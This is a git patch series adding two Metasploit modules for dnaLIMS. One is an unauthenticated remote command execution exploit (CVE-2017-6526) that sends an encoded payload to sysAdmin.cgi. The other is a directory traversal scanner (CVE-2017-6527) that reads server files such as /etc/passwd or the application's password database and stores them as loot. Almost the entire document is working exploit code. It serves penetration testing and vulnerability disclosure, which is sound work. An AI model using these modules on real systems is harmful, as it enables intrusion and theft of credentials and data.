From 95a01b9f5e878974b8c66c4e6b8684ae416652e4 Mon Sep 17 00:00:00 2001 From: flakey-biscuits Date: Thu, 9 Mar 2017 09:46:18 -0500 Subject: [PATCH 1/4] add dnaLIMS exploits --- .../exploits/linux/http/dnalims_admin_exec.rb | 109 ++++++++++++++++++ .../linux/http/dnalims_file_retrieve.rb | 84 ++++++++++++++ 2 files changed, 193 insertions(+) create mode 100644 modules/exploits/linux/http/dnalims_admin_exec.rb create mode 100644 modules/exploits/linux/http/dnalims_file_retrieve.rb diff --git a/modules/exploits/linux/http/dnalims_admin_exec.rb b/modules/exploits/linux/http/dnalims_admin_exec.rb new file mode 100644 index 0000000000..879ee29e30 --- /dev/null +++ b/modules/exploits/linux/http/dnalims_admin_exec.rb @@ -0,0 +1,109 @@ + + +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'dnaLIMS Admin Module Command Execution', + 'Description' => %q{ + This module utilizes an administrative module which allows for + command execution. This page is completely unprotected from any + authentication when given a POST command. + }, + 'Author' => + [ + 'h00die ', # Discovery, PoC + 'flakey_biscuit' # Discovery, PoC + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2017-6526'] + ['US-CERT-VU', '929263'] + ['URL', 'https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/'] + ], + 'Platform' => %w( linux unix ), + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'Space' => 1024, + 'DisableNops' => true, + 'Compat' => + { + 'RequiredCmd' => 'perl' # software written in perl, and guaranteed to be there + } + }, + 'Targets' => + [ + [ 'Automatic Target', { }] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Mar 8 2017' + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path to dnaLIMS', '/cgi-bin/dna/']) + ], self.class + ) + end + + def check + begin + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'sysAdmin.cgi'), + 'method' => 'POST', + 'vars_post' => { + 'investigator' => '', + 'username' => '', + 'navUserName' => '', + 'Action' => 'executeCmd', + 'executeCmdData' => 'perl -V' + } + ) + if res && res.body + if /Summary of/ =~ res.body + Exploit::CheckCode::Vulnerable + else + Exploit::CheckCode::Safe + end + else + Exploit::CheckCode::Safe + end + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + end + end + + def exploit + begin + vprint_status('Sending Exploit') + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'sysAdmin.cgi'), + 'method' => 'POST', + 'vars_post' => { + 'investigator' => '', + 'username' => '', + 'navUserName' => '', + 'Action' => 'executeCmd', + 'executeCmdData' => 'ls', + } + ) + vprint_good(res.body) + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + end + end +end + + diff --git a/modules/exploits/linux/http/dnalims_file_retrieve.rb b/modules/exploits/linux/http/dnalims_file_retrieve.rb new file mode 100644 index 0000000000..521fd71749 --- /dev/null +++ b/modules/exploits/linux/http/dnalims_file_retrieve.rb @@ -0,0 +1,84 @@ + + +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Auxiliary + + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'DnaLIMS Directory Traversal', + 'Description' => %q{ + This module exploits a directory traversal vulnerability found in dnaLIMS. + Due to the way the viewAppletFsa.cgi script handles the 'secID' parameter, it is possible + to read a file outside the www directory. + }, + 'References' => + [ + ['CVE', '2017-6527'] + ['US-CERT-VU', '929263'] + ['URL', 'https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/'] + ], + 'Author' => + [ + 'h00die', # Discovery, PoC + 'flakey_biscuit' # Discovery, PoC + ], + 'License' => MSF_LICENSE, + 'DisclosureDate' => "N/A" + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path to dnaLIMS', '/cgi-bin/dna/']), + OptString.new('FILE', [ true, "The path to the file to view", '/etc/passwd']), + OptInt.new('DEPTH', [true, 'The max traversal depth', 11]) + ], self.class) + + deregister_options('RHOST') + end + + + def run_host(ip) + file = (datastore['FILE'][0,1] == '/') ? datastore['FILE'] : "#{datastore['FILE']}" + traverse = "../" * datastore['DEPTH'] + uri = normalize_uri(target_uri.path) + base = File.dirname("#{uri}/.") + + print_status("Requesting: #{file} - #{rhost}") + res = send_request_cgi({ + 'uri' => "#{base}/viewAppletFsa.cgi", + 'vars_get' => { 'secID' => "#{traverse}#{file}", + 'Action' => 'blast', + 'hidenav' => '1' + } + }) + + if not res + print_error("No response from server.") + return + end + + + if res.code != 200 + print_error("Server returned a non-200 response (body will not be saved):") + print_line(res.to_s) + return + end + + vprint_line(res.body) + p = store_loot('dnaLIMS.traversal.file', 'application/octet-stream', ip, res.body, File.basename(file)) + print_good("File saved as: #{p}") + end + +end + + From 0ab3ad86ee9c17fc761548db668cd679036940ac Mon Sep 17 00:00:00 2001 From: flakey-biscuits Date: Thu, 9 Mar 2017 10:06:31 -0500 Subject: [PATCH 2/4] change dnalims_file_retrieve module type --- modules/exploits/linux/http/dnalims_file_retrieve.rb | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/modules/exploits/linux/http/dnalims_file_retrieve.rb b/modules/exploits/linux/http/dnalims_file_retrieve.rb index 521fd71749..5429601ec8 100644 --- a/modules/exploits/linux/http/dnalims_file_retrieve.rb +++ b/modules/exploits/linux/http/dnalims_file_retrieve.rb @@ -7,7 +7,8 @@ require 'msf/core' -class MetasploitModule < Msf::Auxiliary +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report @@ -33,7 +34,7 @@ class MetasploitModule < Msf::Auxiliary 'flakey_biscuit' # Discovery, PoC ], 'License' => MSF_LICENSE, - 'DisclosureDate' => "N/A" + 'DisclosureDate' => "Mar 8 2017" )) register_options( @@ -56,7 +57,7 @@ class MetasploitModule < Msf::Auxiliary print_status("Requesting: #{file} - #{rhost}") res = send_request_cgi({ 'uri' => "#{base}/viewAppletFsa.cgi", - 'vars_get' => { 'secID' => "#{traverse}#{file}", + 'vars_get' => { 'secID' => "#{traverse}#{file}", 'Action' => 'blast', 'hidenav' => '1' } From fe5167bf2686d8211aa7323bd1fe3781a8f800ff Mon Sep 17 00:00:00 2001 From: h00die Date: Mon, 20 Mar 2017 10:16:42 -0400 Subject: [PATCH 3/4] changes to file per pr --- modules/exploits/linux/http/dnalims_admin_exec.rb | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/modules/exploits/linux/http/dnalims_admin_exec.rb b/modules/exploits/linux/http/dnalims_admin_exec.rb index 879ee29e30..11e0dee83f 100644 --- a/modules/exploits/linux/http/dnalims_admin_exec.rb +++ b/modules/exploits/linux/http/dnalims_admin_exec.rb @@ -1,5 +1,3 @@ - - ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework @@ -18,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module utilizes an administrative module which allows for command execution. This page is completely unprotected from any - authentication when given a POST command. + authentication when given a POST request. }, 'Author' => [ @@ -28,8 +26,8 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ - ['CVE', '2017-6526'] - ['US-CERT-VU', '929263'] + ['CVE', '2017-6526'], + ['US-CERT-VU', '929263'], ['URL', 'https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/'] ], 'Platform' => %w( linux unix ), @@ -96,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote 'username' => '', 'navUserName' => '', 'Action' => 'executeCmd', - 'executeCmdData' => 'ls', + 'executeCmdData' => payload.encoded, } ) vprint_good(res.body) From fd5345a869d09362359113cd945bce07b360b9a5 Mon Sep 17 00:00:00 2001 From: h00die Date: Mon, 20 Mar 2017 10:40:43 -0400 Subject: [PATCH 4/4] updates per pr --- .../scanner}/http/dnalims_file_retrieve.rb | 22 ++++++++----------- .../exploits/linux/http/dnalims_admin_exec.rb | 4 ++-- 2 files changed, 11 insertions(+), 15 deletions(-) rename modules/{exploits/linux => auxiliary/scanner}/http/dnalims_file_retrieve.rb (81%) diff --git a/modules/exploits/linux/http/dnalims_file_retrieve.rb b/modules/auxiliary/scanner/http/dnalims_file_retrieve.rb similarity index 81% rename from modules/exploits/linux/http/dnalims_file_retrieve.rb rename to modules/auxiliary/scanner/http/dnalims_file_retrieve.rb index 5429601ec8..8ba8c83828 100644 --- a/modules/exploits/linux/http/dnalims_file_retrieve.rb +++ b/modules/auxiliary/scanner/http/dnalims_file_retrieve.rb @@ -1,5 +1,3 @@ - - ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework @@ -7,8 +5,7 @@ require 'msf/core' -class MetasploitModule < Msf::Exploit::Remote - Rank = ExcellentRanking +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report @@ -24,14 +21,14 @@ class MetasploitModule < Msf::Exploit::Remote }, 'References' => [ - ['CVE', '2017-6527'] - ['US-CERT-VU', '929263'] + ['CVE', '2017-6527'], + ['US-CERT-VU', '929263'], ['URL', 'https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/'] ], 'Author' => [ - 'h00die', # Discovery, PoC - 'flakey_biscuit' # Discovery, PoC + 'h00die ', # Discovery, PoC + 'flakey_biscuit ' # Discovery, PoC ], 'License' => MSF_LICENSE, 'DisclosureDate' => "Mar 8 2017" @@ -40,8 +37,8 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ OptString.new('TARGETURI', [true, 'The base path to dnaLIMS', '/cgi-bin/dna/']), - OptString.new('FILE', [ true, "The path to the file to view", '/etc/passwd']), - OptInt.new('DEPTH', [true, 'The max traversal depth', 11]) + OptString.new('FILE', [ true, "The path to the file to view", '/home/dna/spool/.pfile']), # password db for app + OptInt.new('DEPTH', [true, 'The traversal depth', 4]) ], self.class) deregister_options('RHOST') @@ -57,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Requesting: #{file} - #{rhost}") res = send_request_cgi({ 'uri' => "#{base}/viewAppletFsa.cgi", - 'vars_get' => { 'secID' => "#{traverse}#{file}", + 'vars_get' => { 'secID' => "#{traverse}#{file}%00", 'Action' => 'blast', 'hidenav' => '1' } @@ -68,14 +65,13 @@ class MetasploitModule < Msf::Exploit::Remote return end - if res.code != 200 print_error("Server returned a non-200 response (body will not be saved):") print_line(res.to_s) return end - vprint_line(res.body) + vprint_good(res.body) p = store_loot('dnaLIMS.traversal.file', 'application/octet-stream', ip, res.body, File.basename(file)) print_good("File saved as: #{p}") end diff --git a/modules/exploits/linux/http/dnalims_admin_exec.rb b/modules/exploits/linux/http/dnalims_admin_exec.rb index 11e0dee83f..dd4c92822a 100644 --- a/modules/exploits/linux/http/dnalims_admin_exec.rb +++ b/modules/exploits/linux/http/dnalims_admin_exec.rb @@ -20,8 +20,8 @@ class MetasploitModule < Msf::Exploit::Remote }, 'Author' => [ - 'h00die ', # Discovery, PoC - 'flakey_biscuit' # Discovery, PoC + 'h00die ', # Discovery, PoC + 'flakey_biscuit ' # Discovery, PoC ], 'License' => MSF_LICENSE, 'References' =>